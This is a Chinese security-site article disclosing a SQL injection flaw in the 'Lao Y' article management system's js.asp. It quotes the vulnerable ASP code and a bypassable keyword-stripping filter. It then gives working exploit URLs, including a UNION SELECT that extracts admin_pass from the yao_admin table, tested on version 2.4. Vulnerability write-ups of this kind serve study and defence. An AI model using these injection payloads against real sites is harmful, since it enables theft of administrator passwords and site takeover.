为了顺应当前形势和更好的发展,黑基网已于9月19日正式更名为【安基网】,域名更换为www.safebase.cn,请卸载旧的APP并安装新的APP,给您带来不便,敬请理解!谢谢

黑基Web安全攻防班
安基网 首页 IT技术 安全攻防 查看内容

老Y文章管理系统注射0day

2009-6-16 09:30| 投稿: security

摘要:   漏洞等级:中等  漏洞说明:  漏洞出现在js.asp中,我们首先看源代码。  Code:  If CheckStr(Request("ClassNo")) <> "" then  C...
  漏洞等级:中等  漏洞说明:  漏洞出现在js.asp中,我们首先看源代码。  Code:  If CheckStr(Request("ClassNo")) <> "" then  ClassNo = split(CheckStr(Request("ClassNo")),"|")  '这里是获取变量利用checkstr过滤,但是感觉好像没起作用。然后分成数组  on error resume next  NClassID = LaoYRequest(ClassNo(0))  NClassID1 = LaoYRequest(ClassNo(1))  '获取数组1,与数组2进行整形过滤。这里没有漏洞  End if  num = LaoYRequest(request.querystring("num"))'这里num必须>=1  .......  set rs=server.createObject("Adodb.recordset")  sql = "Select top "& num &" ID,Title,TitleFontColor,Author,ClassID,DateAndTime,Hits,IsTop,IsHot from Yao_Article Where yn = 0"  If NclassID<>"" and NclassID1="" then  If Yao_MyID(NclassID)="0" then  SQL=SQL&" and ClassID="&NclassID&""  else  MyID = Replace(""&Yao_MyID(NclassID)&"","|",",")  SQL=SQL&" and ClassID in ("&MyID&")"  End if  elseif NclassID<>"" and NclassID1<>"" then  MyID = Replace(""&Request("ClassNo")&"","|",",")  SQL=SQL&" and ClassID in ("&MyID&")"  '这里出现的问题classno并没做其他过滤就写入到查询  End if  select case topType  case "new" sql=sql&" order by DateAndTime desc,ID desc"  case "hot" sql=sql&" order by hits desc,ID desc"  case "IsHot" sql=sql&" and IsHot = 1 order by ID desc"  end select  set rs = conn.execute(sql)  if rs.bof and rs.eof then  str=str+"没有符合条件的文章"  ........  -------------------------------  function.asp  Code:  function CheckStr(str)  CheckStr=replace(replace(replace(replace(str,"<","<"),">",">"),chr(13),"")," ","")  CheckStr=replace(replace(replace(replace(CheckStr,"'",""),"and",""),"insert",""),"set","")  CheckStr=replace(replace(replace(replace(CheckStr,"select",""),"update",""),"delete",""),chr(34),"")  CheckStr=replace(replace(replace(replace(replace(CheckStr,"*",""),"=",""),"or",""),"mid",""),"count","")  end function  利用代码:  js.asp?num=1&ClassNo=1|1|1[SQL]  js.asp?num=1&ClassNo=1|1|1) union select 1,admin_pass,3,4,5,6,7,8,9 from yao_admin where id in(1  ####获取密码代码  备注:本漏洞在2.4版本测试  站长站下载地址http://down.chinaz.com/soft/23126.htm

小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册黑基账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!



免责声明:本文由投稿者转载自互联网,版权归原作者所有,文中所述不代表本站观点,若有侵权或转载等不当之处请联系我们处理,让我们一起为维护良好的互联网秩序而努力!联系方式见网站首页右下角。


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

最新

返回顶部